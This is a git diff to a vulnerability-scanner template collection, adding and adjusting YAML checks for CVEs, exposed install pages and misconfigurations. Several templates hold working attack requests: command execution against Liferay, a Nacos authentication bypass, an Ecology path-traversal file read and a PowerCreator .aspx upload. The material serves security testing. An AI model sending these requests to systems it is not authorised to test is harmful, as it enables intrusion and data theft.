diff --git a/README.md b/README.md index 798e2dbde5..092bb7d343 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 305 | vulnerabilities | 145 | exposed-panels | 124 | -| takeovers | 68 | exposures | 91 | technologies | 66 | -| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 | +| cves | 306 | vulnerabilities | 147 | exposed-panels | 124 | +| takeovers | 68 | exposures | 92 | technologies | 66 | +| misconfiguration | 56 | workflows | 30 | miscellaneous | 20 | | default-logins | 24 | exposed-tokens | 0 | dns | 8 | | fuzzing | 8 | helpers | 8 | iot | 11 | -**102 directories, 1049 files**. +**103 directories, 1054 files**. diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml index dcbf8b8b71..8f6e44259c 100644 --- a/cves/2020/CVE-2020-35951.yaml +++ b/cves/2020/CVE-2020-35951.yaml @@ -68,7 +68,7 @@ requests: - "not found in ([/a-z_]+)wp" req-condition: true - matchers-condition: or + matchers-condition: and matchers: - type: word diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index 27f48e35b2..2d5c79bace 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -12,16 +12,6 @@ info: - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - # Affected Versions: 7.30, 7.31, 7.40, 7.50 - - # p.s: - # > Don't forget to change the default credentials - # > to create new admin in associated file: - # > `payloads/CVE-2020-6287.xml` - - # Ref: - # - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287 - requests: - payloads: data: helpers/payloads/CVE-2020-6287.xml @@ -41,4 +31,9 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + + - type: word + words: + - "text/xml" + part: header \ No newline at end of file diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 9c41f7756c..e552deef58 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -15,7 +15,6 @@ requests: command: - "systeminfo" # Windows - "lsb_release -a" # Linux - - "sysctl kern.ostype" # macOS attack: sniper raw: @@ -40,16 +39,15 @@ requests: regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" - - "kern\\.ostype" condition: or part: body - type: status status: - 200 + extractors: - type: regex part: body regex: - "Microsoft Windows (.*)" - - "kern\\.ostype: (.*)" - "Distributor ID: (.*)" \ No newline at end of file diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 334555dc68..4a7f5a15fd 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -34,3 +34,8 @@ requests: - type: status status: - 200 + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/cves/2021/CVE-2021-29441.yaml b/cves/2021/CVE-2021-29441.yaml new file mode 100644 index 0000000000..b1d13ad24d --- /dev/null +++ b/cves/2021/CVE-2021-29441.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-29441 + +info: + name: Nacos prior to 1.4.1 Authentication Bypass + description: | + This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5. + + In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) + Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that + enables Nacos servers to bypass this filter and therefore skip authentication checks. + This mechanism relies on the user-agent HTTP header so it can be easily spoofed. + This issue may allow any user to carry out any administrative tasks on the Nacos server. + author: dwisiswant0 + severity: high + reference: https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/ + tags: nacos,auth-bypass,cve,cve2021 + +requests: + - raw: + - | + POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1 + Host: {{Hostname}} + Accept: */* + User-Agent: Nacos-Server + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 403" + - "status_code_2 == 200" + condition: and + + - type: dsl + dsl: + - "contains(body_1, 'Forbidden')" + - "contains(body_2, 'true')" + condition: and + + - type: word + words: + - "application/json" + part: header \ No newline at end of file diff --git a/exposures/files/gogs-install-exposure.yaml b/exposures/files/gogs-install-exposure.yaml new file mode 100644 index 0000000000..a7369b2cb4 --- /dev/null +++ b/exposures/files/gogs-install-exposure.yaml @@ -0,0 +1,25 @@ +id: gogs-install-exposure + +info: + name: Gogs install exposure + author: dhiyaneshDk + severity: high + tags: gogs,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/install' + + matchers-condition: and + matchers: + - type: word + words: + - "General Settings" + - "Database Settings" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml index 02c4ff5b64..009f96d571 100644 --- a/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml +++ b/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml @@ -21,5 +21,6 @@ requests: - type: word words: - '{{randstr}}' - - 'suggestions' + - '"results":' + - '"suggestions":' condition: and diff --git a/misconfiguration/nginx-status.yaml b/misconfiguration/nginx/nginx-status.yaml similarity index 93% rename from misconfiguration/nginx-status.yaml rename to misconfiguration/nginx/nginx-status.yaml index 89c66665d6..0213a72eb5 100644 --- a/misconfiguration/nginx-status.yaml +++ b/misconfiguration/nginx/nginx-status.yaml @@ -4,7 +4,7 @@ info: name: Nginx Status Page author: dhiyaneshDK severity: low - tags: config,nginx + tags: misconfig,nginx requests: - method: GET diff --git a/misconfiguration/nginx/nginx-vhost-traffic-status.yaml b/misconfiguration/nginx/nginx-vhost-traffic-status.yaml new file mode 100644 index 0000000000..f6f6f728ca --- /dev/null +++ b/misconfiguration/nginx/nginx-vhost-traffic-status.yaml @@ -0,0 +1,25 @@ +id: nginx-vhost-traffic-status + +info: + name: Nginx Vhost Traffic Status + author: geeknik + reference: https://github.com/vozlt/nginx-module-vts + severity: low + tags: status,nginx,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/status" + + matchers-condition: and + matchers: + - type: word + words: + - "Nginx Vhost Traffic Status" + - "Host" + - "Zone" + condition: and + - type: status + status: + - 200 diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index c2d10fe491..6164d7c1cd 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -16,10 +16,10 @@ requests: - type: regex part: header regex: - - kong+ + - "[Ss]erver: [Kk]ong+" extractors: - - type: regex + - type: kval part: header - regex: - - .*kong.* + kval: + - server diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml new file mode 100644 index 0000000000..3ebe236378 --- /dev/null +++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml @@ -0,0 +1,20 @@ +id: ecology-filedownload-directory-traversal +info: + name: Ecology Directory Traversal + author: princechaddha + severity: medium + tags: ecology,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "/weaver/" + part: body diff --git a/vulnerabilities/other/gloo-unauth.yaml b/vulnerabilities/other/gloo-unauth.yaml new file mode 100644 index 0000000000..4a27ed3b2d --- /dev/null +++ b/vulnerabilities/other/gloo-unauth.yaml @@ -0,0 +1,32 @@ +id: gloo-unauth + +info: + name: Unauthenticated Gloo UI + author: dhiyaneshDk + severity: high + tags: unauth,gloo + +requests: + - method: GET + path: + - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' + headers: + User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" + Content-type: "application/grpc-web+proto" + Referer: "{{BaseURL}}/admin/" + + matchers-condition: and + matchers: + - type: word + words: + - "gke-remote" + part: body + + - type: word + words: + - "application/grpc-web+proto" + part: header + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index 9b8b5067f9..c898de0884 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -21,7 +21,7 @@ requests: Content-Disposition: form-data; name="file1"; filename="poc.aspx" Content-Type: image/jpeg - Poc_Test + {{randstr}} -----------------------------20873900192357278038549710136-- - | @@ -38,7 +38,8 @@ requests: regex: - "(.*?.ASPX)" + req-condition: true matchers: - type: dsl dsl: - - "contains(body, 'Poc_Test') && status_code == 200" \ No newline at end of file + - "contains(body_2, '{{randstr}}') && status_code_2 == 200" \ No newline at end of file